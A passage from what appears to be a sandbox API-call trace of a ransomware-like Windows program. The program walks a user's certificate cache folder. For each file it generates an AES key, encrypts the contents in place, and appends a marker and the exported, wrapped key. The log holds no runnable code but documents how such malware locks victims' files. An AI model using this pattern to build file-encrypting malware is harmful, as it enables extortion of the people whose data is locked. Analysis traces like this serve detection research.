dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.142] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0144.142] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0144.142] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.142] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x1d7, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x1d7, lpOverlapped=0x0) returned 1 [0144.142] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0144.142] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1d7, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1e0) returned 1 [0144.142] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.142] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x1e0, lpOverlapped=0x0) returned 1 [0144.142] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0144.142] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0144.142] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0144.142] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0144.143] CloseHandle (hObject=0x198) returned 1 [0144.159] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.163] CryptDestroyKey (hKey=0x3b8690) returned 1 [0144.163] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.163] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0144.163] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0144.163] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875", dwFileAttributes=0x80) returned 1 [0144.164] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\0f1583fff42fff476a09801acb69213f_e3f4a8c96454d7d3441d2c1bce81f875"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0144.164] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=1377) returned 1 [0144.164] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=1377) returned 1 [0144.164] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x43f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.164] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0144.167] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.167] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0144.168] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0144.168] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.168] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x561, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x561, lpOverlapped=0x0) returned 1 [0144.168] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0144.168] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x561, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x570) returned 1 [0144.168] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.168] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x570, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x570, lpOverlapped=0x0) returned 1 [0144.168] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0144.168] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0144.168] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0144.168] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0144.168] CloseHandle (hObject=0x198) returned 1 [0144.185] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.189] CryptDestroyKey (hKey=0x3b8690) returned 1 [0144.189] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.189] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0144.189] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0144.189] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973", dwFileAttributes=0x80) returned 1 [0144.190] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\1bb09beec155258835c193a7aa85aa5b_a7b2b53af2a12e2cb0a41b96d21d7973"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0144.190] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=472) returned 1 [0144.190] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=472) returned 1 [0144.191] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0xb6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.191] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0144.191] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.191] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0144.191] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0144.191] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.191] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x1d8, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x1d8, lpOverlapped=0x0) returned 1 [0144.192] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0144.192] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1d8, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1e0) returned 1 [0144.192] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.192] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x1e0, lpOverlapped=0x0) returned 1 [0144.192] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0144.192] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0144.192] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0144.192] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0144.192] CloseHandle (hObject=0x198) returned 1 [0144.209] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.213] CryptDestroyKey (hKey=0x3b8690) returned 1 [0144.213] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.213] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0144.213] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0144.213] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1DAF2884EC4DFA96BA4A58D4DBC9C406", dwFileAttributes=0x80) returned 1 [0144.214] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1DAF2884EC4DFA96BA4A58D4DBC9C406" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\1daf2884ec4dfa96ba4a58d4dbc9c406"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0144.214] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=3869) returned 1 [0144.214] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=3869) returned 1 [0144.214] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0xdfb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.214] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0144.215] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.215] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0144.215] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0144.215] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.215] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0xf1d, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0xf1d, lpOverlapped=0x0) returned 1 [0144.216] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0144.216] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0xf1d, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0xf20) returned 1 [0144.216] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.216] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xf20, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0xf20, lpOverlapped=0x0) returned 1 [0144.216] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0144.216] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0144.216] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0144.216] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0144.216] CloseHandle (hObject=0x198) returned 1 [0144.232] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.236] CryptDestroyKey (hKey=0x3b8690) returned 1 [0144.236] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.236] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0144.237] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0144.237] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\23B523C9E7746F715D33C6527C18EB9D", dwFileAttributes=0x80) returned 1 [0144.238] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\23B523C9E7746F715D33C6527C18EB9D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\23b523c9e7746f715d33c6527c18eb9d"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0144.238] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=325) returned 1 [0144.238] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=325) returned 1 [0144.238] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x23, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.238] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0144.239] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.239] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0144.239] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0144.239] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.239] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x145, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x145, lpOverlapped=0x0) returned 1 [0144.239] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0144.239] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x145, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x150) returned 1 [0144.239] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.239] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x150, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x150, lpOverlapped=0x0) returned 1 [0144.239] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0144.239] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0144.239] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0144.239] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0144.239] CloseHandle (hObject=0x198) returned 1 [0144.265] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.270] CryptDestroyKey (hKey=0x3b8690) returned 1 [0144.270] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.270] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0144.270] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0144.270] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3130B1871A126520A8C47861EFE3ED4D", dwFileAttributes=0x80) returned 1 [0144.270] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3130B1871A126520A8C47861EFE3ED4D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\3130b1871a126520a8c47861efe3ed4d"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0144.270] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=521) returned 1 [0144.271] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=521) returned 1 [0144.271] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0xe7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.271] ReadFile (in: hFile=0x198, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0144.271] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.271] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0144.271] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0144.271] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.272] ReadFile (in: hFile=0x198, lpBuffer=0x2760000, nNumberOfBytesToRead=0x209, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x209, lpOverlapped=0x0) returned 1 [0144.272] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0144.272] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x209, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x210) returned 1 [0144.272] SetFilePointer (in: hFile=0x198, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.272] WriteFile (in: hFile=0x198, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x210, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x210, lpOverlapped=0x0) returned 1 [0144.272] WriteFile (in: hFile=0x198, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0144.272] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0144.272] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0144.272] WriteFile (in: hFile=0x198, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0144.272] CloseHandle (hObject=0x198) returned 1 [0144.288] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.292] CryptDestroyKey (hKey=0x3b8690) returned 1 [0144.292] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.292] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0144.292] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, 